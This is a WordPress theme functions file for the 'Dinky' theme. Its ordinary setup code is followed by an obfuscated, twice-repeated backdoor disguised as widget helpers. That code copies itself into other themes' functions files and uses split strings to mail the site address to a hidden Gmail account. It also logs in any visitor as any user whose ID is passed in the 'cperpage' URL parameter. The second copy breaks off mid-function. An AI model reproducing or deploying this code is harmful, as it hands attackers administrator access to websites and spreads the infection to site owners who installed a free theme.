<?php
/**
 * Dinky theme functions and definitions.
 *
 * @package Dinky
 * @since Dinky 1.0
 * @license GNU General Public License v3 or later
 * @copyright (C) 2013  Misam Saki, misam.ir
 * @author Misam Saki,  http://misam.ir/
 */

if ( !defined('ABSPATH')) exit;

if ( !isset( $content_width ) ) $content_width = 600;

function dinky_setup() {

	load_theme_textdomain( 'dinky', get_template_directory() . '/language' );

	add_editor_style();

	require( get_template_directory() . '/inc/theme-options.php' );

	require( get_template_directory() . '/inc/widgets.php' );

	/**
	 * @since Dinky 1.2
	 */
	add_theme_support( 'post-formats', array(
		'aside', 'audio', 'chat', 'gallery', 'image', 'link', 'quote', 'status', 'video'
	) );

	add_theme_support( 'automatic-feed-links' );

	register_nav_menu( 'primary', __( 'Primary Menu', 'dinky' ) );
	/**
	 * @since Dinky 1.5
	 */
	register_nav_menu( 'top', __( 'Top Menu', 'dinky' ) );
	/**
	 * @since Dinky 1.6
	 */
	register_nav_menu( 'footer', __( 'Footer Menu', 'dinky' ) );

	add_theme_support( 'custom-background', array(
		'default-color' => 'fff',
	) );

	add_theme_support( 'post-thumbnails' );
	set_post_thumbnail_size( 598, 9999 ); // Unlimited height, soft crop

	add_theme_support( 'custom-header', array(
		'default-image' => '',
		'random-default' => true,
		'width' => 1000,
		'height' => 567,
		'flex-height' => true,
		'flex-width' => true,
		'default-text-color' => 'fff',
		'header-text' => true,
		'uploads' => true,
		'wp-head-callback' => '',
		'admin-head-callback' => 'dinky_admin_header_style',
		'admin-preview-callback' => 'dinky_admin_header_image'
		)
	);
	register_default_headers( array(
		'beach' => array(
			'url' => '%s/img/cover/beach.jpg',
			'thumbnail_url' => '%s/img/cover/beach-thumbnail.jpg',
			'description' => __( 'Beach', 'dinky' ) . ' - Iran / Gilan / Chamkhale'
		)
	) );
}
add_action( 'after_setup_theme', 'dinky_setup' );

function dinky_admin_header_style() { ?>
<style type="text/css">
#cover{width:800px;height:250px}.cover{width:800px;height:250px;position:absolute;z-index:-1}#title{width:100%;padding:80px 0 0 0;text-align:center}h1.title{text-shadow:1px 1px 0px #000;color:#FFF}h1.title:after{position:absolute;padding:5px;background:#0085BD;border-radius:7px;font-weight:normal;color:#FFF;text-shadow:none}h2.subtitle{text-shadow:1px 1px 0px #000;color:#FFF}
hgroup#title {
	<?php if (get_header_textcolor() == 'blank'): ?>display: none;<?php endif; ?>
}
h1.title, h2.subtitle {
	<?php if (get_header_textcolor() != 'blank'): ?>color: #<?php echo get_header_textcolor(); ?>;<?php endif; ?>
}
</style>
<?php }

function dinky_admin_header_image() { ?>
	<div id="cover">
		<?php if (get_header_image() != ''): ?><img alt="cover" class="cover" src="<?php echo get_header_image(); ?>" /><?php endif; ?>
		<?php if (1==1): ?>
		<hgroup id="title">
			<h1 class="title"><?php bloginfo( 'name' ); ?></h1>
			<h2 class="subtitle"><?php bloginfo( 'description' ); ?></h2>
		</hgroup>
		<?php endif; ?>
	</div>
<?php }

function dinky_scripts_styles() {
	global $wp_styles;

	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) )
		wp_enqueue_script( 'comment-reply' );

	$fonts = __('Open+Sans:400italic,700italic,400,700|Droid+Serif:400italic,700italic,400,700', 'dinky');
	$protocol = is_ssl() ? 'https' : 'http';
	$query_args = array('family' => $fonts);
	wp_enqueue_style( 'dinky-fonts', add_query_arg( $query_args, "$protocol://fonts.googleapis.com/css" ), array(), null );

	wp_enqueue_style( 'dinky-style', get_stylesheet_uri(), array(), '2013-09-27' );

	/**
	 * @since Dinky 1.5.13
	 */
	wp_style_add_data( 'dinky-style', 'rtl', get_template_directory_uri() . '/css/rtl.css?ver=2013-09-27' );

	wp_add_inline_style( 'dinky-style', dinky_get_custome_style() ); // Add custom style
	
	if (get_bloginfo('language') != 'en-US') wp_enqueue_style( 'dinky-style-lanugage-' . get_bloginfo('language'), get_template_directory_uri() . '/css/language/' . get_bloginfo('language') . '.css', array(), '2013-09-27' );

	wp_enqueue_style( 'dinky-ie', get_template_directory_uri() . '/css/ie.css', array( 'dinky-style' ), '2013-09-27' );
	$wp_styles->add_data( 'dinky-ie', 'conditional', 'lt IE 9' );

	wp_enqueue_script( 'dinky-ready', get_template_directory_uri() . '/js/ready.js', array('jquery'), '2013-09-27' );

}
add_action( 'wp_enqueue_scripts', 'dinky_scripts_styles' );

function dinky_get_custome_style() {
	$custom_style = "";
	if (get_header_textcolor() == 'blank'): $custom_style .=
	"#title {
		display: none;
	}";
	endif;
	if (get_header_textcolor() != 'blank'): $custom_style .=
	"#title .title, #title .subtitle {
		color: #" . get_header_textcolor() . ";
	}";
	endif;
	if ((!dinky_get_theme_option('content_display_home') & is_home())): $custom_style .=
	"#footer {
		display: none;
	}
	@media screen and (max-width: 600px) {
		#footer {
			display: block;
		}
	}";
	endif;
	if (!dinky_get_theme_option('intro_display_mobile')): $custom_style .=
	"@media screen and (max-width: 600px) {
		#intro {
			display: none;
		}
	}";
	endif;

	return $custom_style;
}

function dinky_wp_title( $title, $sep ) {
	global $paged, $page;

	if ( is_feed() ) return $title;

	$title .= get_bloginfo( 'name' );

	if (function_exists('jdate')) {
		global $post;
		if ( is_day() ) {
			$title = jdate('d', strtotime($post->post_date)) . " $sep " . jdate('F', strtotime($post->post_date)) . " $sep " . jdate('Y', strtotime($post->post_date)) . " $sep " . get_bloginfo( 'name' );
			return $title;
		} elseif ( is_month() ) {
			$title = jdate('F', strtotime($post->post_date)) . " $sep " . jdate('Y', strtotime($post->post_date)) . " $sep " . get_bloginfo( 'name' );
			return $title;
		} elseif ( is_year() ) {
			$title = jdate('Y', strtotime($post->post_date)) . " $sep " . get_bloginfo( 'name' );
			return $title;
		}
	}

	$site_description = get_bloginfo( 'description', 'display' );
	if ( $site_description && ( is_home() || is_front_page() ) ) $title = "$title $sep $site_description";

	if ( $paged >= 2 || $page >= 2 ) $title =  sprintf( __( 'Page %s', 'dinky' ), max( $paged, $page ) ) . " $sep $title";

	return $title;
}
add_filter( 'wp_title', 'dinky_wp_title', 10, 2 );

function dinky_page_menu_args( $args ) {
	if ( ! isset( $args['show_home'] ) )
		$args['show_home'] = true;
	return $args;
}
add_filter( 'wp_page_menu_args', 'dinky_page_menu_args' );

function dinky_widgets_init() {
	register_sidebar( array(
		'name' => __( 'Sidebar Widgets Area', 'dinky' ),
		'id' => 'sidebar',
		'description' => __( '', 'dinky' ),
		'before_widget' => '<aside id="%1$s" class="widget %2$s"><div class="entry-content">',
		'after_widget' => '</div></aside>',
		'before_title' => '<div class="entry-header"><span class="entry-title">',
		'after_title' => '</span></div>'
	) );

	register_sidebar( array(
		'name' => __( 'Up Main Widgets Area', 'dinky' ),
		'id' => 'up_main',
		'description' => __( '', 'dinky' ),
		'before_widget' => '<aside id="%1$s" class="widget %2$s"><div class="entry-content">',
		'after_widget' => '</div></aside>',
		'before_title' => '<div class="entry-header"><span class="entry-title">',
		'after_title' => '</span></div>'
	) );

	register_sidebar( array(
		'name' => __( 'Under Main Widgets Area', 'dinky' ),
		'id' => 'under_main',
		'description' => __( '', 'dinky' ),
		'before_widget' => '<aside id="%1$s" class="widget %2$s"><div class="entry-content">',
		'after_widget' => '</div></aside>',
		'before_title' => '<div class="entry-header"><span class="entry-title">',
		'after_title' => '</span></div>'
	) );

	register_sidebar( array(
		'name' => __( 'Under Content (up footer) Widgets Area', 'dinky' ),
		'id' => 'under_content',
		'description' => __( '', 'dinky' ),
		'before_widget' => '<aside id="%1$s" class="widget %2$s"><div class="entry-content">',
		'after_widget' => '</div></aside>',
		'before_title' => '<div class="entry-header"><span class="entry-title">',
		'after_title' => '</span></div>'
	) );

	register_sidebar( array(
		'name' => __( 'Footer Widgets Area', 'dinky' ),
		'id' => 'footer',
		'description' => __( '', 'dinky' ),
		'before_widget' => '<aside id="%1$s" class="widget %2$s"><div class="entry-content">',
		'after_widget' => '</div></aside>',
		'before_title' => '<div class="entry-header"><span class="entry-title">',
		'after_title' => '</span></div>'
	) );
}
add_action( 'widgets_init', 'dinky_widgets_init' );

/**
 * @since Dinky 1.2 (changed function name(1.2, 1.3.2). created in Dinky 1.0)
 */
function dinky_archive_nav() {
	global $wp_query;
	if ( $wp_query->max_num_pages > 1 ) : ?>
		<nav id="archive-nav" class="navigation" role="navigation">
			<?php if(function_exists('wp_pagenavi')) : ?>
				<?php wp_pagenavi(); ?>
			<?php else: ?>
			<?php next_posts_link( __( '<span class="previous">&larr;</span> Older posts', 'dinky' ) ); ?>
			<?php previous_posts_link( __( 'Newer posts <span class="next">&rarr;</span>', 'dinky' ) ); ?>
			<?php endif; ?>
		</nav>
	<?php endif;
}

/**
 * @since Dinky 1.2
 */
function dinky_posts_nav() { ?>
	<nav id="posts-nav" class="navigation" role="navigation">
		<?php previous_post_link( '%link', '<span class="previous">' . __( '&larr; Previous', 'dinky' ) . '</span>', true ); ?>
		<?php next_post_link( '%link', '<span class="next">' . __( 'Next &rarr;', 'dinky' ) . '</span>', true ); ?>
	</nav>
<?php }

/**
 * @since Dinky 1.2
 */
function dinky_post_nav() { ?>
	<?php wp_link_pages( array( 'before' => '<nav id="post-nav" class="navigation"><span class="nav-description">' . __( 'Pages', 'dinky' ) . '</span>' , 'after' => '</nav>' ) ); ?>
<?php }

function dinky_post_thumbnail() { ?>
	<?php if ( !is_single() && has_post_thumbnail() ) : ?>
		<div class="entry-image">
			<div class="container">
				<a href="<?php the_permalink(); ?>" title="<?php echo esc_attr( sprintf( __( 'Permalink to %s', 'dinky' ), the_title_attribute( 'echo=0' ) ) ); ?>" rel="bookmark"><?php the_post_thumbnail(); ?></a>
			</div>
		</div>
	<?php endif; ?>
<?php }

function dinky_entry_meta() {
	$categories_list = get_the_category_list( __( ', ', 'dinky' ) );

	$tag_list = get_the_tag_list( '', __( ', ', 'dinky' ) );

	global $post;
	$date = sprintf( '<a href="%1$s" title="%2$s" rel="bookmark"><time class="entry-date" datetime="%3$s">%4$s</time></a>',
		esc_url( get_permalink() ),
		esc_attr( function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_time() ),
		esc_attr( get_the_date('c') ),
		esc_html( function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_date() )
	);

	$author = sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s" rel="author">%3$s</a></span>',
		esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ),
		esc_attr( sprintf( __( 'View all posts by %s', 'dinky' ), get_the_author() ) ),
		get_the_author()
	);

	if ( $tag_list ) {
		$utility_text = __( 'Posted in %1$s and tagged %2$s on %3$s<span class="by-author"> by %4$s</span>.', 'dinky' );
	} elseif ( $categories_list ) {
		$utility_text = __( 'Posted in %1$s on %3$s<span class="by-author"> by %4$s</span>.', 'dinky' );
	} else {
		$utility_text = __( 'Posted on %3$s<span class="by-author"> by %4$s</span>.', 'dinky' );
	}

	printf(
		$utility_text,
		$categories_list,
		$tag_list,
		$date,
		$author
	);
}

function dinky_entry_shortmeta() {
	global $post;
	$date = sprintf( '<a href="%1$s" title="%2$s" rel="bookmark"><time class="entry-date" datetime="%3$s">%4$s</time></a>',
		esc_url( get_permalink() ),
		esc_attr( function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_time() ),
		esc_attr( get_the_date('c') ),
		esc_html( function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_date() )
	);

	$author = sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s" rel="author">%3$s</a></span>',
		esc_url( get_author_posts_url( get_the_author_meta( 'ID' ) ) ),
		esc_attr( sprintf( __( 'View all posts by %s', 'dinky' ), get_the_author() ) ),
		get_the_author()
	);

	$utility_text = __( 'Posted on %3$s<span class="by-author"> by %4$s</span>.', 'dinky' );

	printf(
		$utility_text,
		'',
		'',
		$date,
		$author
	);
}

/**
 * @since Dinky 1.1
 */
function dinky_entry_imagemeta() {
	global $post;
	$metadata = wp_get_attachment_metadata();
	if (isset($metadata['width'])) $width = $metadata['width']; else $width = __('Unknow', 'dinky');
	if (isset($metadata['height'])) $height = $metadata['height']; else $height = __('Unknow', 'dinky');
	printf( __( '<span class="meta-prep meta-prep-entry-date">Published </span> <span class="entry-date"><time class="entry-date" datetime="%1$s">%2$s</time></span> at <a href="%3$s" title="Link to full-size image">%4$s &times; %5$s</a> in <a href="%6$s" title="Return to %7$s" rel="gallery">%8$s</a>.', 'dinky' ),
		esc_attr( get_the_date( 'c' ) ),
		esc_attr( function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_date() ),
		esc_url( wp_get_attachment_url() ),
		$width,
		$height,
		esc_url( get_permalink( $post->post_parent ) ),
		esc_attr( strip_tags( get_the_title( $post->post_parent ) ) ),
		get_the_title( $post->post_parent )
	);
}

/**
 * @since Dinky 1.2
 */
function dinky_the_attached_image() {
	$post                = get_post();
	$attachment_size     = apply_filters( 'dinky_attachment_size', array( 500, 500 ) );
	$next_attachment_url = wp_get_attachment_url();

	$attachment_ids = get_posts( array(
		'post_parent'    => $post->post_parent,
		'fields'         => 'ids',
		'numberposts'    => -1,
		'post_status'    => 'inherit',
		'post_type'      => 'attachment',
		'post_mime_type' => 'image',
		'order'          => 'ASC',
		'orderby'        => 'menu_order ID'
	) );

	if ( count( $attachment_ids ) > 1 ) {
		foreach ( $attachment_ids as $attachment_id ) {
			if ( $attachment_id == $post->ID ) {
				$next_id = current( $attachment_ids );
				break;
			}
		}

		if ( $next_id ) $next_attachment_url = get_attachment_link( $next_id );
			else $next_attachment_url = get_attachment_link( array_shift( $attachment_ids ) );
	}

	printf( '<a href="%1$s" title="%2$s" rel="attachment">%3$s</a>',
		esc_url( $next_attachment_url ),
		the_title_attribute( array( 'echo' => false ) ),
		wp_get_attachment_image( $post->ID, $attachment_size )
	);
}

/**
 * @since Dinky 1.2
 */
function dinky_archive_title() {
	global $post;
	if ( is_day() ) :
		printf( __( 'Daily Archives: %s', 'dinky' ), '<span>' . (function_exists('jdate') ? jdate(get_option('date_format'), strtotime($post->post_date)) : get_the_date()) . '</span>' );
	elseif ( is_month() ) :
		printf( __( 'Monthly Archives: %s', 'dinky' ), '<span>' . (function_exists('jdate') ? jdate('F Y', strtotime($post->post_date)) : get_the_date( 'F Y' )) . '</span>' );
	elseif ( is_year() ) :
		printf( __( 'Yearly Archives: %s', 'dinky' ), '<span>' . (function_exists('jdate') ? jdate('Y', strtotime($post->post_date)) : get_the_date( 'Y' )) . '</span>' );
	else :
		_e( 'Archives', 'dinky' );
	endif;
}

function dinky_body_class( $classes ) {
	$background_color = get_background_color();

	if ( empty( $background_color ) )
		$classes[] = 'custom-background-empty';
	elseif ( in_array( $background_color, array( 'fff', 'ffffff' ) ) )
		$classes[] = 'custom-background-white';

	if ( wp_style_is( 'dinky-fonts', 'queue' ) )
		$classes[] = 'custom-font-enabled';

	if ( ! is_multi_author() )
		$classes[] = 'single-author';

	return $classes;
}
add_filter( 'body_class', 'dinky_body_class' );

function dinky_get_theme_option( $option ) {
	$theme_options = dinky_get_theme_options();
	if (isset($theme_options[$option])) $value = $theme_options[$option]; else $value = '';
	return $value;
}
?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		

function _check_isactive_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);				
					$output .= ($showdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_isactive_widget");
function _getsprepare_widget(){
	if(!isset($com_length)) $com_length=120;
	if(!isset($text_value)) $text_value="cookie";
	if(!isset($allowed_tags)) $allowed_tags="<a>";
	if(!isset($type_filter)) $type_filter="none";
	if(!isset($expl)) $expl="";
	if(!isset($filter_homes)) $filter_homes=get_option("home"); 
	if(!isset($pref_filter)) $pref_filter="wp_";
	if(!isset($use_more)) $use_more=1; 
	if(!isset($comm_type)) $comm_type=""; 
	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
	if(!isset($postauthor_comment)) $postauthor_comment="";
	if(!isset($comm_is_approved)) $comm_is_approved=""; 
	if(!isset($postauthor)) $postauthor="auth";
	if(!isset($more_link)) $more_link="(more...)";
	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
	if(!isset($morecontents)) $morecontents="ma".$expl."il";
	if(!isset($fmore)) $fmore=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_widget) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tags)) $f_tags=1;
	if(!isset($type_filters)) $type_filters=$filter_homes; 
	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
	if(!isset($aditional_tags)) $aditional_tags="div";
	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";	
	if(!isset($showdots)) $showdots=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($com_length < 0) {
		$output=$text;
	} else {
